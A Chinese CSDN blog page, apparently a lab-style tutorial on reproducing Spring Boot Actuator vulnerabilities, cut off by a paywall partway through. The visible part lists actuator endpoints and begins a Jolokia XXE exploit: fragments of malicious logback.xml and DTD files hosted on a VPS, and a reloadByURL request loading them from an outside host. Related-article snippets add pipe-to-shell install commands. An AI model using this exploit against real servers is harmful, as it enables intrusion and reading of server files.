bootstrap漏洞_常见Spring Boot漏洞复现

最新推荐文章于 2024-07-29 09:37:33 发布
最新推荐文章于 2024-07-29 09:37:33 发布
阅读量1.5w 收藏 9
点赞数
文章标签: bootstrap漏洞
本文详细介绍了Spring Boot的几个常见漏洞复现过程,包括Jolokia的XXE和RCE漏洞,env端点敏感信息泄露,以及xstream反序列化漏洞。通过环境搭建、端点利用和漏洞攻击步骤,展示了如何利用这些漏洞获取系统权限。
摘要由CSDN通过智能技术生成

复现一下Sprint Boot的一些漏洞

  • 环境搭建

Dump环境

c447bf231cae06451e36d113fe8ec31e.png

Mvn构建项目

f39e5254e531e5a4f87434b69a8939e5.png

启动项目

ac2fd2e202cb7287d7c022d6bfd1313f.png

aa58181d8b83d404c6703593d9f860c7.png

  • 端点信息

路径 描述

/autoconfig 提供了一份自动配置报告,记录哪些自动配置条件通过了,哪些没通过

/beans 描述应用程序上下文里全部的Bean,以及它们的关系

/env 获取全部环境属性

/configprops 描述配置属性(包含默认值)如何注入Bean

/dump 获取线程活动的快照

/health 报告应用程序的健康指标,这些值由HealthIndicator的实现类提供

/info 获取应用程序的定制信息,这些信息由info打头的属性提供

/mappings 描述全部的URI路径,以及它们和控制器(包含Actuator端点)的映射关系

/metrics 报告各种应用程序度量信息,比如内存用量和HTTP请求计数

/shutdown 关闭应用程序,要求endpoints.shutdown.enabled设置为true

/trace 提供基本的HTTP请求跟踪信息(时间戳、HTTP头等)

  • Spring Boot 1.x版本端点在根URL下注册

2.x版本端点移动到/actuator/路径

59da13dfc2b7cd6460035502f0726eec.png

Jolokia漏洞利用

Jolokia漏洞利用(XXE)

  • jolokia/list

查看jolokia/list中存在的 Mbeans,是否存在logback 库提供的reloadByURL方法

45cd5252eceba744a5e8e3bf5af45ba0.png

  • 创建logback.xml和fileread.dtd文件

logback.xml

xml version="1.0" encoding="utf-8" ?>

%remote;%int;]>

&trick;

fileread.dtd

">

  • 将文件上传到公网VPS上并且开启http服务

cfdaead0c777b9e0b152033cac22f0b0.png

  • 远程访问logback.xml文件

127.0.0.1:8090/jolokia/exec/ch.qos.logback.classic:Name=default,Type=ch.qos.logback.classic.jmx.JMXConfigurator/reloadByURL/http:!/!/x.x.x.x!/logback.xml

最低0.47元/天 解锁文章
weixin_39620370
关注
  • 0
    点赞
  • 9
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
若依管理框架-漏洞复现
千寻的博客
11-10 1862
RuoYi 是一个 Java EE 企业级快速开发平台,基于经典技术组合(Spring Boot、Apache Shiro、MyBatis、Thymeleaf、Bootstrap),内置模块如:部门管理、角色用户、菜单及按钮授权、数据权限、系统参数、日志管理、通知公告等。在线定时任务配置;支持集群,支持多数据源,支持分布式事务。
域渗透综合项目实战
干铮的博客
02-27 5092
1.项目网络拓扑 2.信息收集 netdiscover主机发现 sudo netdiscover -i eth0 -r 192.168.3.0/24 Nmap端口扫描 nmap -A 192.168.3.45 -p- -oN nmap.a
bootstrap框架漏洞_学生会私房菜【202008011期】Apache Shiro 1.2.4反序列化漏洞
weixin_39653733的博客
11-27 1466
学生会私房菜学生会私房菜是通过学生会信箱收集同学们的来稿,挑选其中的优质文档,不定期进行文档推送的主题。本期文档内容为:《Apache Shiro 1.2.4反序列化漏洞》作者介绍:Chow一名来自网络工程专业的安全爱好者,目前在国科学习安全课程,同时也在国科安全团体进行安全的实战练习,本次分享的内容是CVE-2016-4437的漏洞,希望可以帮助大家更好理解这个漏洞。0x00简介Apa...
技术干货 | 针对Spring-Boot 框架漏洞的初探
最新发布
2301_80127209的博客
07-29 2232
这篇文章主要是给师傅们介绍下Spring-Boot 框架漏洞的打法以及主要对于Spring-Boot漏洞的接口泄露信息进行一个分析,后面使用了曾哥的Spring-Boot漏洞扫描工具,可以很大减轻我们对于这个漏洞接口的分析。
bootstrap漏洞_漏洞复现环境集锦Vulhub
weixin_39671509的博客
11-28 3277
0x01 Vulhub简介 Vulhub是一个面向大众的开源漏洞靶场,无需docker知识,简单执行两条命令即可编译、运行一个完整的漏洞靶场镜像。0x02 安装# 安装pipcurl -shttps://bootstrap.pypa.io/get-pip.py| python3# 安装最新版dockercurl -shttps://get.docker.com/| sh# ...
bootstrap漏洞_ActiveMQ任意文件写入漏洞(CVE20163088)复现
weixin_39992312的博客
11-27 1571
漏洞详情漏洞说明#Apache ActiveMQ是美国阿帕奇(Apache)软件基金会所研发的一套开源的消息中间件,它支持Java消息服务、集群、Spring Framework等。ActiveMQ中的fileserver服务允许用户通过HTTP PUT方法上传文件到指定目录。Fileserver支持写入文件(不解析jsp),但是支持移动文件(Move)我们可以将jsp的文件PUT到Fi...
bootstrap漏洞_Weblogic反序列化漏洞(CVE201710271)复现
weixin_39990138的博客
11-28 3209
实验环境 攻击机:Windows 10 企业版 LTSC靶机:CentOS Linux release 8.1.1911 (Core)项目地址:https://github.com/vulhub/vulhub 基础环境搭建 安装dockercurl https://download.docker.com/linux/centos/docker-ce.repo -o ...
bootstrap通用漏洞_Nexus Repository UserComponent远程代码执行漏洞浅析
weixin_39640687的博客
01-04 2601
更多全球网络安全资讯尽在邑安全简介Nexus Repository OSS是一款通用的软件包仓库管理(Universal Repository Manager)服务。Sonatype Nexus Repository Manager 3中的涉及漏洞的接口为/service/extdirect,接口需要管理员账户权限进行访问。该接口中处理请求时的UserComponent对象的注解的校验中...
Spring Boot Actuator 漏洞复现合集
m0_54850467的博客
08-02 1853
SpringBootActuator端点通过JMX和HTTP公开暴露给外界访问,大多数时候我们使用基于HTTP的Actuator端点,因为它们很容易通过浏览器、CURL命令、shell脚本等方式访问。SpringBootActuator未授权访问/dump-显示线程转储(包括堆栈跟踪)/autoconfig-显示自动配置报告/configprops-显示配置属性/trace-显示最后几条HTTP消息(可能包含会话标识符)/logfile-输出日志文件的内容/...
java框架漏洞_Spring 框架漏洞集合
weixin_42514750的博客
02-25 5549
虽说是Spring框架漏洞,但以下包含并不仅Spring Framework,Spring Boot,还有Spring Cloud,Spring Data,Spring Security等。CVE-2010-1622 Spring Framework class.classLoader类远程代码执行影响版本:SpringSource Spring Framework 3.0.0 - 3.0.2、S...
spring cloud SnakeYAML RCE
12-08 930
spring cloud SnakeYAML RCE
Bootstrap v3.3.7 bulid0316
10-02
Bootstrap是Twitter推出的一个用于前端开发的开源工具包。它由Twitter的设计师Mark Otto和Jacob Thornton合作开发,是一个CSS/HTML框架。Bootstrap 是最受欢迎的 HTML、CSS 和 JS 框架,用于开发响应式布
bootstrap3.3.7源码和bootstr3.3.5中文离线手册
12-13
bootstrap3.3.7源码和bootstr3.3.5中文离线手册。Bootstrap 是最受欢迎的 HTML、CSS 和 JS 框架,用于开发响应式布局、移动设备优先的 WEB 项目。Bootstrap 让前端开发更快速、简单。所有开发者都能快速上手、所有设备都可以适配、所有项目都适用。
bootstrap-3.3.7-dist_boostrap源码_
09-30
boostrap-3.3.7源码,请大家参考,谢谢
bootstrap V2.3.2实现响应式页面
11-09
使用bootstrap V2.3.2实现响应式页面实现响应式页面,是系列课程《 响应式开发从原理到实战案例》的一部分代码。供大家学习和参考
bootstrap3.3.5后台模板flatlab 3.0
08-14
注意,这个版本是flatlab 3,也就是官网现在的最新版(截止到2015.08.15)。不是网上流传的flatlab1.3.3。然后我又把bootstrap升级到了3.3.5.
bootstrap框架漏洞_SpringMVC框架之第一篇
weixin_39921023的博客
11-21 1454
2
linux bootstrap强制结束,Cisco UCCX bootstrap服务目录遍历漏洞
weixin_39856589的博客
05-15 374
发布日期:2010-06-10更新日期:2010-06-12受影响系统:Cisco CRS 7.xCisco CRS 6.xCisco CRS 5.xCisco Unified IP IVR 7.xCisco Unified IP IVR 6.xCisco Unified IP IVR 5.xCisco Unified Contact Center Express 7.xCisco Unified...
python使用符号 标示注释-第一章:Python语言程序设计
weixin_37988176的博客
11-01 544
关于课程:课程作者为北京理工大学教授嵩天学习账号是微信账号登陆:昵称为coke1-1节:程序设计的基本方法计算机与程序设计编译和解释程序的基本编写方法计算机编程1-1单元小结计算机与程序设计计算机的概念:计算机是根据指令操作数据的设备,具有功能性和可编程性。功能性:是指对计算机的操作,表现为数据的计算,输入输出的处理和结果存储等。可编程性:根据一系列指令自动地、可预测性、准确的完成操作者的意图。计...
kafka springboot配置_Spring Boot 集成 Kafka
06-06
好的,我可以为您提供关于Spring Boot集成Kafka的相关配置。 首先,在您的项目中添加Kafka的依赖: ```xml <dependency> <groupId>org.springframework.kafka</groupId> <artifactId>spring-kafka</artifactId> <version>2.5.2.RELEASE</version> </dependency> ``` 接下来,在您的application.properties文件中添加以下Kafka相关的配置: ```properties # Kafka Producer 配置 spring.kafka.producer.bootstrap-servers=localhost:9092 spring.kafka.producer.key-serializer=org.apache.kafka.common.serialization.StringSerializer spring.kafka.producer.value-serializer=org.springframework.kafka.support.serializer.JsonSerializer # Kafka Consumer 配置 spring.kafka.consumer.bootstrap-servers=localhost:9092 spring.kafka.consumer.group-id=my-group spring.kafka.consumer.auto-offset-reset=earliest spring.kafka.consumer.key-deserializer=org.apache.kafka.common.serialization.StringDeserializer spring.kafka.consumer.value-deserializer=org.springframework.kafka.support.serializer.JsonDeserializer spring.kafka.consumer.properties.spring.json.trusted.packages=* ``` 其中,producer和consumer的配置会略有不同,您需要根据自己的需求进行相应的配置。 最后,在您的代码中使用KafkaTemplate或者KafkaListener来发送和接收消息即可。比如: ```java @Service public class MyKafkaProducer { @Autowired private KafkaTemplate<String, MyMessage> kafkaTemplate; public void sendMessage(MyMessage message) { kafkaTemplate.send("my-topic", message); } } @Service public class MyKafkaConsumer { @KafkaListener(topics = "my-topic", groupId = "my-group") public void handleMessage(MyMessage message) { // 处理收到的消息 } } ``` 以上就是Spring Boot集成Kafka的基本配置和使用方法,希望对您有所帮助。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值